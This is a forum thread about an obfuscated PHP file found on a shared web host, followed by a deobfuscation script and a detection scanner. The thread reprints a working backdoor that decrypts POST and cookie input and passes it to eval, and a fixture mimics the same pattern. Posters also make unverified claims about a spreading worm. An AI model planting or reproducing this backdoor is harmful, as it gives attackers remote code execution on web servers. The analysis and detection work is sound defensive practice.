PHP Virus on My Shared Server Web Host (What is this?)

Several randomly named php files show up on my website daily, with obscured php text inside the files. The (virus) has infected the entire (300+ websites) shared server and HostGator keeps saying they are “trying” to remove it. It’s been months. Anyway, does anyone know what this obscured php code is doing? Thanks for any help!

<?php
// Each of the next four assignments spells out a PHP function name from escaped bytes and chr(A - B); the /* ... */ blocks are padding.
// resolves to "str_repeat"
$QDrpq	= "\x73"   ./* jAL  */"\164"	./*  lYOpC */chr (114)    .     chr     (95)/*   jUeO */./*   mrKiB   */chr/* BWH */(    666/*  pGJG  */-	552/*   UM*/).chr  (101)   .	chr (112)  .	"\x65"	.   "\x61"	.	"\x74";
// resolves to "explode"
    $eOiaz    =	chr	(101)   ./*  Xm  */"\x78"/*   uQIg */.     chr    (  180/*  xX   */-     68	).chr	(108)/* xBsxS */.   'o'	.	"\x64"/*Q*/./*zQjJT */"\x65";


// resolves to "count"
$tfwhnZIIg/* siqa*/=/*  qGR */chr/*  sa*/(99) ./*  GM*/chr  (   752	-    641	)."\165"	./* Aq */"\x6e"	.    't';
// resolves to "pack"
				$kyUSM =/*  Kb  */"\160"   . "\141"	.	chr	(/*  EfSB */976	-/*GAWg */877	).'k';
// decoy arrays mixed in with the real request input below
   $vdUgpBog    =    Array	(/*   CC  */"zkCzdqZ"/*gtG   */=>/*  xiBA  */"devWZhFMcEJJpbpPiRuFWB"  );
       $eRCfZSfcE	=	Array	(/*  VkFZ   */"sRftEcwUUANnsNQUwVJiYpdrUg"	=>	"DIpwsJGoThYjfbJywX"/* y  */);
// walks every POST field and every cookie (plus the decoys); the loop body runs once per key/value pair
				   foreach     (    Array(   $vdUgpBog,/*XDSQH*/$_POST,	$eRCfZSfcE,/* wJ   */$_COOKIE,/*UEtW*/$vdUgpBog)    as	$JpSTIY)    {
			/* FCY  */foreach    (/*MCl */$JpSTIY/* Amn*/as	$sizBZ	=>	$IMDimAXSfR	)     {
// pack('H*', $value): hex-decodes the value; the @ hides warnings on non-hex input
				   $IMDimAXSfR/*   h */=/*q   */@$kyUSM( 'H'/*   ep  */.   chr  (/*nmGe   */754 -/* vOo   */712/*  Xd  */),/* J   */$IMDimAXSfR	);


// key = parameter name + hard-coded constant
    $sizBZ	.=	"cMaddtC-NOZP-hjfvIOe-JAaoaQh-yDR-tKjgRqY-XULU";


// str_repeat(): stretches the key to at least the length of the decoded value
/*SEHs  */$sizBZ	=	$QDrpq    (/*pQjum*/$sizBZ, (  strlen(/*  MzE */$IMDimAXSfR	)/strlen(/*   YeuIH*/$sizBZ     )	)	+   1);


// XOR-decrypts the value with the stretched key
	$fuOJQqrsm     =	$IMDimAXSfR ^/* a */$sizBZ;


// explode('#', ...): splits the result on '#'
/* L  */$fuOJQqrsm	=/*  DrIPy */$eOiaz/*  lBm */(/* ITdQ */chr/*   kog  */(	592	-	557	),/* Olgvy   */$fuOJQqrsm	);
// count() == 3 means the value was <prefix>#<function name>#<argument>; the sample then runs eval($fn($arg)) and exits
				   if   (/*  DDM*/$tfwhnZIIg	(/* XUkQ  */$fuOJQqrsm ) ==/*VBrQ   */3    )	{
					/*   p */eval	(    $fuOJQqrsm[1]	(    $fuOJQqrsm[2]/*Y   */)     );
  	exit/*  Mbt*/();
    }
		  }
    	}
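The sample hides every function name behind escaped bytes, chr() arithmetic and comment padding, so the first step in reading it is to resolve those string-building lines without running any PHP. The following is an added example (not code from the thread or from any poster): a small static resolver that strips the /* ... */ padding and concatenates "\xHH" / "\OOO" literals, single-quoted literals and chr(N) / chr(A - B) calls. The SAMPLE text is a constructed copy of the four name-building lines from the post above with tabs replaced by spaces; anything that is not a pure string expression raises ValueError rather than being guessed at.

```python
r"""Static resolver for the string-building lines in the PHP sample above.

Added example, not code from the thread or any poster. It strips the
/* ... */ padding and then concatenates "\xHH" / "\OOO" double-quoted
literals, single-quoted literals and chr(N) or chr(A - B) calls, which is
everything the sample uses to hide the names of the functions it calls.
Nothing is executed: an expression containing anything else (a variable,
a call) raises ValueError instead of being guessed at.
"""
import re

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
TERM_RE = re.compile(
    r'"((?:\\.|[^"\\])*)"'                         # double-quoted literal
    r"|'((?:\\.|[^'\\])*)'"                        # single-quoted literal
    r"|\bchr\s*\(\s*(\d+)\s*(?:-\s*(\d+))?\s*\)"   # chr(N) or chr(A - B)
)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*([^;]+);")

# Constructed copies of the four function-name assignments from the sample
# (padding comments kept, tabs replaced by spaces).
SAMPLE = r'''
$QDrpq = "\x73" ./* jAL */"\164" ./* lYOpC */chr (114) . chr (95)/* jUeO */./* mrKiB */chr/* BWH */( 666/* pGJG */- 552/* UM*/).chr (101) . chr (112) . "\x65" . "\x61" . "\x74";
$eOiaz = chr (101) ./* Xm */"\x78"/* uQIg */. chr ( 180/* xX */- 68 ).chr (108)/* xBsxS */. 'o' . "\x64"/*Q*/./*zQjJT */"\x65";
$tfwhnZIIg/* siqa*/=/* qGR */chr/* sa*/(99) ./* GM*/chr ( 752 - 641 )."\165" ./* Aq */"\x6e" . 't';
$kyUSM =/* Kb */"\160" . "\141" . chr (/* EfSB */976 -/*GAWg */877 ).'k';
'''


def strip_comments(src):
    return COMMENT_RE.sub("", src)


def php_unescape(body):
    r"""Decode the escapes PHP honours inside double quotes: \xHH, \OOO, \n, \t, \r, \\, \", \$."""
    simple = {"n": "\n", "t": "\t", "r": "\r", "\\": "\\", '"': '"', "$": "$"}
    out, i = [], 0
    while i < len(body):
        if body[i] != "\\" or i + 1 >= len(body):
            out.append(body[i])
            i += 1
            continue
        nxt = body[i + 1]
        if nxt == "x":
            m = re.match(r"[0-9A-Fa-f]{1,2}", body[i + 2:i + 4])
            if m:
                out.append(chr(int(m.group(), 16)))
                i += 2 + len(m.group())
                continue
        m = re.match(r"[0-7]{1,3}", body[i + 1:i + 4])
        if m:
            out.append(chr(int(m.group(), 8)))
            i += 1 + len(m.group())
            continue
        out.append(simple.get(nxt, "\\" + nxt))   # unknown escapes stay as written, as in PHP
        i += 2
    return "".join(out)


def resolve(expr):
    """Evaluate a pure string-building expression; raise ValueError on anything else."""
    expr = strip_comments(expr)
    pieces, rest, last = [], [], 0
    for m in TERM_RE.finditer(expr):
        rest.append(expr[last:m.start()])
        last = m.end()
        dq, sq, a, b = m.groups()
        if dq is not None:
            pieces.append(php_unescape(dq))
        elif sq is not None:
            pieces.append(sq.replace("\\'", "'").replace("\\\\", "\\"))
        else:
            pieces.append(chr(int(a) - int(b or 0)))
    rest.append(expr[last:])
    # Only '.' operators and whitespace may remain between the terms.
    leftover = "".join(rest).replace(".", "").strip()
    if leftover:
        raise ValueError("not a pure string expression, found: %r" % leftover[:30])
    return "".join(pieces)


def is_pure_string_expr(expr):
    try:
        resolve(expr)
        return True
    except ValueError:
        return False


def resolve_assignments(src):
    """Map $name -> decoded string for every assignment whose right-hand side resolves."""
    found = {}
    for name, rhs in ASSIGN_RE.findall(strip_comments(src)):
        if is_pure_string_expr(rhs):
            found[name] = resolve(rhs)
    return found


if __name__ == "__main__":
    for name, value in resolve_assignments(SAMPLE).items():
        print("$%s = %r" % (name, value))
    print(repr(resolve("'H' . chr(754 - 712)")), repr(resolve("chr(592 - 557)")))
```

With the four names resolved (str_repeat, explode, count, pack) and the two remaining chr() calls ('H*' and '#'), the loop in the sample reads plainly: for each POST field and cookie, pack('H*', ...) hex-decodes the value, the key (field name plus the hard-coded constant) is stretched with str_repeat and XORed against it, and if the result splits on '#' into three parts, the middle part is called on the last part and its return value is passed to eval. Two points matter for detection: the file needs no particular URL, parameter name or cookie name, so web-server logs are best searched for POST requests to unexpected .php paths rather than for a fixed parameter; and content signatures should match the chr(A - B) arithmetic and the comment padding rather than the variable names.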

Nope and I am not going to try to find out. :rofl:

1 Like

Lol! Hey I don’t blame you. I have this thing in an offline php sandbox trying to figure it out. It’s wild and moves fast. I need a PHP expert to figure this one out. My IT boss (very smart php admin) couldn’t figure it out.

You sure this is a virus? Is your site down? Honestly, it looks like a bunch of gibberish…

Yes, it’s a virus. It spreads from server to server very well. In my sandbox I see that it opens a back door for remote access. I’m guessing for the bot controller to execute admin commands/code. It’s pretty slick and quiet and good at avoiding detection.

Wow! Did you ever figure out the server’s vulnerability?

I found out what this php virus is doing. This is only one of 3 other php files that make up this worm virus. It’s using php(eval), a known troublemaker, along with cookies and php post to somehow make its way from web server to web server, avoiding detection. Once on the server it opens a back door to allow remote execution of even more malicious code, depending on what the server has data-wise and what network it’s on.

This took a small team of hackers to figure it out today and send me details. The org bot controller connection is very encoded and I can’t break it aka don’t know where the control point is.

It’s still on a few servers of HostGator, shared servers, meaning 2,000+ websites are probably infected. Looking for important data to steal and send back to the botnet.

Ouch. But how did it get infected? Is HostGator (which I used to use) vulnerable? The reason I ask is for information so I can make sure my site is secure. It is fully dedicated with a firewall…

From the stats I’ve gathered, it’s infecting from WordPress sites that are on HostGator. I reached out to 1&1, GoDaddy, Bluehost and a few others, with sample signatures of this virus. They said zero detections were found so it seems as if this was built around a HostGator/WordPress exploit.

You will see a randomly named, encoded php file in some random directory of your website. From what I’ve found, it likes to hide where other php files are at, to blend in. Never just plain index or images etc. Pretty smart worm/virus bot.

It does not need WordPress to spread though as I’ve never used WordPress and it got into my websites’ directories. I’m still not sure how it’s infecting websites without WordPress but I’m working on it. I’ve got the code decoded and decrypted, I will post later when home.
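Since the dropped file carries a random name and sits among legitimate PHP files, the name is not a useful indicator; the content is. The following is an added example (not the poster's code and not any hosting provider's tooling): a Python triage scanner that walks a web root, strips the /* ... */ padding, scores each .php file on the traits visible in the sample posted earlier in this thread (eval, POST/COOKIE input, chr(A - B) arithmetic, escaped byte strings, $var() calls, comment padding) and lists files at or above a threshold. It assumes a Unix-like host where the web root is readable; the two fixture files it scans in demo mode are constructed for the demo, and the weights and threshold are my own choices to tune against local false positives.

```python
"""Content-based triage for obfuscated PHP files dropped on a web host.

Added example, not the poster's code and not any hosting provider's tool.
Walks a web root, strips /* ... */ padding, scores each .php file on the
traits visible in the sample in this thread and lists files at or above a
threshold. Assumes a Unix-like host where the web root is readable; the
two fixture files used by demo() are constructed.
"""
import os
import re
import sys
import tempfile

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
# (label, pattern applied to comment-stripped source, weight added once if present)
INDICATORS = [
    ("eval", re.compile(r"\beval\s*\("), 3),
    ("request input", re.compile(r"\$_(POST|COOKIE|REQUEST|GET)\b"), 2),
    ("chr arithmetic", re.compile(r"\bchr\s*\(\s*\d+\s*-\s*\d+\s*\)"), 3),
    ("escaped bytes", re.compile(r"\\x[0-9A-Fa-f]{2}|\\[0-7]{3}"), 1),
    ("variable function call", re.compile(r"\$\w+\s*\("), 2),
]
THRESHOLD = 8  # a file needs several independent traits, not just one


def score_source(src):
    """Return (score, hits) for one file's text; hits is a list of (label, count)."""
    comments = len(COMMENT_RE.findall(src))
    clean = COMMENT_RE.sub("", src)
    score, hits = 0, []
    for label, rx, weight in INDICATORS:
        n = len(rx.findall(clean))
        if n:
            hits.append((label, n))
            score += weight
    # More than one block comment per line is padding, not documentation.
    lines = src.count("\n") + 1
    if comments / lines > 1.0:
        hits.append(("comment padding", comments))
        score += 3
    return score, hits


def scan_tree(root, threshold=THRESHOLD):
    """Return [(relative path, score, hits)] for .php files at or above threshold, highest first."""
    flagged = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, hits = score_source(fh.read())
            if score >= threshold:
                flagged.append((os.path.relpath(path, root), score, hits))
    flagged.sort(key=lambda item: -item[1])
    return flagged


# Constructed fixtures: a padded dropper-style file and a benign page.
MALICIOUS_FIXTURE = r'''<?php
$a/* x */=/* y */chr/* z */(666/* q */-/* r */552)."\x65"."\166"."\x61"."\154";
foreach(Array($_POST,$_COOKIE) as $p){ foreach($p as $k=>$v){ $v=@$a($v); eval($v); exit(); } }
'''
BENIGN_FIXTURE = r'''<?php
// constructed benign page: escapes user input before echoing it
$q = isset($_GET['q']) ? $_GET['q'] : '';
echo '<p>' . htmlspecialchars($q, ENT_QUOTES, 'UTF-8') . '</p>';
'''


def demo():
    """Build a two-file web root in a temp dir and return scan_tree() on it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-includes"))
        with open(os.path.join(root, "wp-includes", "xkqzpt.php"), "w") as fh:
            fh.write(MALICIOUS_FIXTURE)
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(BENIGN_FIXTURE)
        return scan_tree(root)


if __name__ == "__main__":
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for rel, score, hits in results:
        print("%3d  %s  %s" % (score, rel, ", ".join("%s x%d" % h for h in hits)))
```

Run it with the web root as the only argument (or with no argument for the built-in demo). Scoring once per indicator rather than per match keeps a long legitimate file with many `$_GET` reads from outscoring a short dropper, and stripping the block comments before matching is what lets the chr(A - B) pattern fire on padded code like `chr/* BWH */( 666 - 552 )`. Treat a hit as a reason to diff the file against a known-good copy of the site, not as proof by itself.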

I appreciate your time!

1 Like